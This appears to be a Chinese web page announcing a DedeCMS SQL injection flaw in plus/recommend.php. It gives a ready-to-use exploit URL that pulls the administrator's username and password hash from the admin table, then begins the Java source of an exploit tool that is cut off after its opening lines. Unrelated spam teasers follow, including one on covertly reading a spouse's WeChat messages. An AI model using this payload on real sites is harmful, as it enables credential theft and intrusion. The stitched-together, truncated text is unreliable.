近日,网友在dedecms中发现了全版本通杀的SQL注入漏洞,目前官方最新版已修复该漏洞,相关利用代码如下:
EXP:
复制代码代码如下:
http://*.*.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\' or mid=@`\'` 1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=111
直接获取就可以得到管理员的用户名与加密后的密码,效果如下图所示
利用工具源码(by 园长):
复制代码代码如下:
package org.javaweb.dede.ui;
import java.awt.Toolkit;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.net.URL;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
/**
*
* @author yz
*/
public class MainFrame extends javax.swing.JFrame {
private static final long serialVersionUID = 1L;
/**
大学生互联网技术的赚钱方法 1今日头条号自媒体平台 假如说如今哪一个平台自媒体最好是,那毫无疑问是今日今日头条。尽管如今自媒体许多,从价格上看,今日头条号给的是十分之高,也有此外一个缘故是很容易入...
社交媒体的风行和百度的溘然伤风晋升了网络营销者的心理。网站搜索引擎优化是否仍然有用,事实上,当我们面临这个问题时,我们应该从两个方面来看。 那么,社交媒体热度不减,网站SEO尚有用吗? 基于以往...
征集志愿怎么填报 (征集志愿能填几个学校?) 目前全国各大省市已经正式开始高校的录取工作了,录取结果也会相继公布。如果考生未能被所报批次的所有高校录取,考生还有机会填报征集志愿。那么,2020征集志...
网络游戏《绝地求生》自今年3月上线后,迅速成为现象级网游:累计销量突破2000万,全球同时在线人数超过200万。同样形成现象的,是游戏中用于作弊的外挂泛滥。据《绝地求生》官微发布,截至11月12日,该...
今天第三篇实例教程,大家立即用CVE-2017-7269系统漏洞开展一次实战演练检测。三篇文章内容你融汇贯通了,基础算黑客入门了。 微软公司层面也早已确定了该系统漏洞:Windows...
怎样绑定老婆微信消息到我手机 当我和我的媳妇成婚时,她报告我他们家没有亲戚,他们的父母也不在了。晓得以后,我或是以为我的媳妇很穷,很小的时分就没有人养活。以是我其时下定刻意,要善待我的媳妇,护卫好她...